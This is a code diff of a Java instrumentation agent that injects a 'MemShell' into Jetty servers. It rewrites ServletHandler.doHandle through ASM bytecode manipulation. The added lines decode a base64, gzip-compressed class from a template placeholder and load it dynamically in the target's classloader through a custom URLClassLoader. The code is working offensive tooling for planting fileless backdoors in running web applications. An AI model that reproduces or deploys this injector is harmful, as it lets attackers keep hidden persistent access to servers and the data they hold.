22
33import org .objectweb .asm .*;
44
5+ import java .io .ByteArrayInputStream ;
6+ import java .io .ByteArrayOutputStream ;
57import java .lang .instrument .ClassFileTransformer ;
68import java .lang .instrument .Instrumentation ;
9+ import java .net .URL ;
10+ import java .net .URLClassLoader ;
711import java .security .ProtectionDomain ;
12+ import java .util .zip .GZIPInputStream ;
813
914/**
1015 * @author ReaJason
1318public class JettyHandlerAgentInjector implements ClassFileTransformer {
1419 private static final String TARGET_CLASS = "org/eclipse/jetty/servlet/ServletHandler" ;
1520 private static final String TARGET_METHOD_NAME = "doHandle" ;
21+ private static Class <?> payload ;
22+ private static ClassLoader targetClassLoader ;
23+ private static String thisClassName = JettyHandlerAgentInjector .class .getName ();
1624
1725 public static String getClassName () {
1826 return "{{advisorName}}" ;
1927 }
2028
29+ public static String getBase64String () {
30+ return "{{base64String}}" ;
31+ }
32+
2133 public static void premain (String args , Instrumentation inst ) throws Exception {
2234 launch (inst );
2335 }
@@ -26,6 +38,20 @@ public static void agentmain(String args, Instrumentation inst) throws Exception
2638 launch (inst );
2739 }
2840
41+
42+ @ Override
43+ public boolean equals (Object obj ) {
44+ if (payload == null ) {
45+ payload = new AgentShellClassLoader (targetClassLoader ).defineDynamicClass (gzipDecompress (decodeBase64 (getBase64String ())));
46+ }
47+ try {
48+ return payload .newInstance ().equals (obj );
49+ } catch (Throwable e ) {
50+ e .printStackTrace ();
51+ return false ;
52+ }
53+ }
54+
2955 private static void launch (Instrumentation inst ) throws Exception {
3056 System .out .println ("MemShell Agent is starting" );
3157 inst .addTransformer (new JettyHandlerAgentInjector (), true );
@@ -43,6 +69,7 @@ private static void launch(Instrumentation inst) throws Exception {
4369 public byte [] transform (final ClassLoader loader , String className , Class <?> classBeingRedefined ,
4470 ProtectionDomain protectionDomain , byte [] bytes ) {
4571 if (TARGET_CLASS .equals (className )) {
72+ targetClassLoader = loader ;
4673 try {
4774 ClassReader cr = new ClassReader (bytes );
4875 ClassWriter cw = new ClassWriter (cr , ClassWriter .COMPUTE_MAXS | ClassWriter .COMPUTE_FRAMES ) {
@@ -71,7 +98,7 @@ public MethodVisitor visitMethod(int access, String name, String descriptor,
7198 if (TARGET_METHOD_NAME .equals (name )) {
7299 try {
73100 Type [] argumentTypes = Type .getArgumentTypes (descriptor );
74- return new AgentShellMethodVisitor (mv , argumentTypes , getClassName () );
101+ return new AgentShellMethodVisitor (mv , argumentTypes , thisClassName );
75102 } catch (Exception e ) {
76103 e .printStackTrace ();
77104 }
@@ -167,4 +194,125 @@ private int getArgIndex(final int arg) {
167194 return index ;
168195 }
169196 }
197+
198+ public static class AgentShellClassLoader extends URLClassLoader {
199+ private final ClassLoader targetClassLoader ;
200+
201+ public AgentShellClassLoader (ClassLoader targetClassLoader ) {
202+ super (new URL [0 ], ClassLoader .getSystemClassLoader ());
203+ this .targetClassLoader = targetClassLoader ;
204+ }
205+
206+ @ SuppressWarnings ("all" )
207+ private Object getClassLoadingLock0 (String className ) {
208+ try {
209+ return getClassLoadingLock (className );
210+ } catch (Throwable t ) {
211+ return this ;
212+ }
213+ }
214+
215+ public Class <?> defineDynamicClass (byte [] bytes ) {
216+ return defineClass (bytes , 0 , bytes .length );
217+ }
218+
219+ @ Override
220+ protected Class <?> loadClass (String name , boolean resolve ) throws ClassNotFoundException {
221+ Class <?> clazz = null ;
222+ if (name == null || name .startsWith ("java." )) {
223+ clazz = getParent ().loadClass (name );
224+ } else {
225+ try {
226+ clazz = findLoadedClass (name );
227+ if (clazz == null ) {
228+ synchronized (getClassLoadingLock0 (name )) {
229+ clazz = findLoadedClass (name );
230+ if (clazz == null ) {
231+ clazz = findClass (name );
232+ }
233+ }
234+ }
235+ } catch (Throwable ignored ) {
236+ }
237+ try {
238+ if (clazz == null ) {
239+ clazz = getParent ().loadClass (name );
240+ }
241+ } catch (ClassNotFoundException e ) {
242+ try {
243+ clazz = tryToLoadByContextClassLoader (name , resolve );
244+ } catch (Throwable ignored ) {
245+ throw e ;
246+ }
247+ }
248+ }
249+
250+ if (resolve ) {
251+ resolveClass (clazz );
252+ }
253+ return clazz ;
254+ }
255+
256+ public Class <?> tryToLoadByContextClassLoader (String name , boolean resolve ) throws ClassNotFoundException {
257+ if (targetClassLoader != null ) {
258+ Class <?> clazz = targetClassLoader .loadClass (name );
259+ if (resolve ) {
260+ resolveClass (clazz );
261+ }
262+ return clazz ;
263+ }
264+ ClassLoader contextClassLoader = Thread .currentThread ().getContextClassLoader ();
265+ if (contextClassLoader != null ) {
266+ Class <?> clazz = contextClassLoader .loadClass (name );
267+ if (resolve ) {
268+ resolveClass (clazz );
269+ }
270+ return clazz ;
271+ } else {
272+ return null ;
273+ }
274+ }
275+ }
276+
277+ @ SuppressWarnings ("all" )
278+ public static byte [] decodeBase64 (String base64Str ) {
279+ Class <?> decoderClass ;
280+ try {
281+ decoderClass = Class .forName ("java.util.Base64" );
282+ Object decoder = decoderClass .getMethod ("getDecoder" ).invoke (null );
283+ return (byte []) decoder .getClass ().getMethod ("decode" , String .class ).invoke (decoder , base64Str );
284+ } catch (Exception ignored ) {
285+ try {
286+ decoderClass = Class .forName ("sun.misc.BASE64Decoder" );
287+ return (byte []) decoderClass .getMethod ("decodeBuffer" , String .class ).invoke (decoderClass .newInstance (), base64Str );
288+ } catch (Exception e ) {
289+ throw new RuntimeException (e );
290+ }
291+ }
292+ }
293+
294+ @ SuppressWarnings ("all" )
295+ public static byte [] gzipDecompress (byte [] compressedData ) {
296+ ByteArrayOutputStream out = new ByteArrayOutputStream ();
297+ GZIPInputStream gzipInputStream = null ;
298+ try {
299+ gzipInputStream = new GZIPInputStream (new ByteArrayInputStream (compressedData ));
300+ byte [] buffer = new byte [4096 ];
301+ int n ;
302+ while ((n = gzipInputStream .read (buffer )) > 0 ) {
303+ out .write (buffer , 0 , n );
304+ }
305+ return out .toByteArray ();
306+ } catch (Exception e ) {
307+ throw new RuntimeException (e );
308+ } finally {
309+ try {
310+ if (gzipInputStream != null ) {
311+ gzipInputStream .close ();
312+ }
313+ out .close ();
314+ } catch (Exception ignored ) {
315+ }
316+ }
317+ }
170318}
0 commit comments